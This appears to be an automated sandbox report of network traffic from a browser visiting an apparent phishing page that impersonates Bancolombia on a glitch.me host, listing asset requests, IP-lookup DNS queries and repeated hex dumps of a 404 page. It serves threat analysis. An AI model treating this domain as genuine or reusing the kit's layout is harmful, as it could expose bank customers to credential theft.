Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: bancolombia-seguridad-co.glitch.meConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /hhhhhh_files/bactouch.css HTTP/1.1Host: bancolombia-seguridad-co.glitch.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/css,*/*;q=0.1Referer: http://bancolombia-seguridad-co.glitch.me/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /hhhhhh_files/toolbar.css HTTP/1.1Host: bancolombia-seguridad-co.glitch.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/css,*/*;q=0.1Referer: http://bancolombia-seguridad-co.glitch.me/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /hhhhhh_files/bact_listview.css HTTP/1.1Host: bancolombia-seguridad-co.glitch.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/css,*/*;q=0.1Referer: http://bancolombia-seguridad-co.glitch.me/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /hhhhhh_files/footer.css HTTP/1.1Host: bancolombia-seguridad-co.glitch.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/css,*/*;q=0.1Referer: http://bancolombia-seguridad-co.glitch.me/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /hhhhhh_files/slidemenu.css HTTP/1.1Host: bancolombia-seguridad-co.glitch.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/css,*/*;q=0.1Referer: http://bancolombia-seguridad-co.glitch.me/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /Casa.css HTTP/1.1Host: bancolombia-seguridad-co.glitch.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/css,*/*;q=0.1Referer: http://bancolombia-seguridad-co.glitch.me/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /nicepage.css HTTP/1.1Host: bancolombia-seguridad-co.glitch.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/css,*/*;q=0.1Referer: http://bancolombia-seguridad-co.glitch.me/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /archivos/style.css HTTP/1.1Host: bancolombia-seguridad-co.glitch.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/css,*/*;q=0.1Referer: http://bancolombia-seguridad-co.glitch.me/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /archivos/bootstrap.css HTTP/1.1Host: bancolombia-seguridad-co.glitch.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/css,*/*;q=0.1Referer: http://bancolombia-seguridad-co.glitch.me/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /archivos/ui.css HTTP/1.1Host: bancolombia-seguridad-co.glitch.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/css,*/*;q=0.1Referer: http://bancolombia-seguridad-co.glitch.me/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /archivos/jquery-ui.css HTTP/1.1Host: bancolombia-seguridad-co.glitch.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/css,*/*;q=0.1Referer: http://bancolombia-seguridad-co.glitch.me/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /archivos/showLoading.css HTTP/1.1Host: bancolombia-seguridad-co.glitch.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/css,*/*;q=0.1Referer: http://bancolombia-seguridad-co.glitch.me/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /hhhhhh_files/authhub-helper.js.descarga HTTP/1.1Host: bancolombia-seguridad-co.glitch.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Referer: http://bancolombia-seguridad-co.glitch.me/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /hhhhhh_files/ap.js.descarga HTTP/1.1Host: bancolombia-seguridad-co.glitch.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Referer: http://bancolombia-seguridad-co.glitch.me/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /archivos/ingre.png HTTP/1.1Host: bancolombia-seguridad-co.glitch.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://bancolombia-seguridad-co.glitch.me/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /twoj.js HTTP/1.1Host: bancolombia-seguridad-co.glitch.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Referer: http://bancolombia-seguridad-co.glitch.me/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /twoj.js HTTP/1.1Host: bancolombia-seguridad-co.glitch.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /archivos/tlf1.html HTTP/1.1Host: bancolombia-seguridad-co.glitch.meConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://bancolombia-seguridad-co.glitch.me/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /css/font/OpenSans-Regular.ttf HTTP/1.1Host: bancolombia-seguridad-co.glitch.meConnection: keep-aliveOrigin: http://bancolombia-seguridad-co.glitch.meUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Referer: http://bancolombia-seguridad-co.glitch.me/archivos/style.cssAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /archivos/logo-personas.svg HTTP/1.1Host: bancolombia-seguridad-co.glitch.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://bancolombia-seguridad-co.glitch.me/archivos/style.cssAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /archivos/icon-user.png HTTP/1.1Host: bancolombia-seguridad-co.glitch.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://bancolombia-seguridad-co.glitch.me/archivos/style.cssAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /archivos/ingre.png HTTP/1.1Host: bancolombia-seguridad-co.glitch.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://bancolombia-seguridad-co.glitch.me/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /css/font/CIBFontSans-Light.ttf HTTP/1.1Host: bancolombia-seguridad-co.glitch.meConnection: keep-aliveOrigin: http://bancolombia-seguridad-co.glitch.meUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Referer: http://bancolombia-seguridad-co.glitch.me/archivos/style.cssAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: bancolombia-seguridad-co.glitch.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://bancolombia-seguridad-co.glitch.me/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.3.306814812.1728836444; _gid=GA1.3.1344817587.1728836444; _gat_UA-597118-7=1; __qca=P0-1559252703-1728836443566
Source: chromecache_76.2.dr, chromecache_68.2.drString found in binary or memory: return b}WC.F="internal.enableAutoEventOnTimer";var hc=la(["data-gtm-yt-inspected-"]),YC=["www.youtube.com","www.youtube-nocookie.com"],ZC,$C=!1; equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: bancolombia-seguridad-co.glitch.me
Source: global trafficDNS traffic detected: DNS query: newsinamerica.com
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: ipinfo.io
Source: global trafficDNS traffic detected: DNS query: mtmarketing.co
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: secure.quantserve.com
Source: global trafficDNS traffic detected: DNS query: rules.quantcount.com
Source: global trafficDNS traffic detected: DNS query: pixel.quantserve.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 13 Oct 2024 16:20:40 GMTContent-Length: 3674Connection: keep-aliveCache-Control: max-age=0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 42 65 6e 74 6f 6e 20 53 61 6e 73 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 53 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 36 30 25 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 33 37 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 33 30 25 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 3
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 13 Oct 2024 16:20:40 GMTContent-Length: 3674Connection: keep-aliveCache-Control: max-age=0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 42 65 6e 74 6f 6e 20 53 61 6e 73 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 53 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 36 30 25 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 33 37 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 33 30 25 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 3
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 13 Oct 2024 16:20:40 GMTContent-Length: 3674Connection: keep-aliveCache-Control: max-age=0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 42 65 6e 74 6f 6e 20 53 61 6e 73 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 53 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 36 30 25 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 33 37 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 33 30 25 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 3
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 13 Oct 2024 16:20:40 GMTContent-Length: 3674Connection: keep-aliveCache-Control: max-age=0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 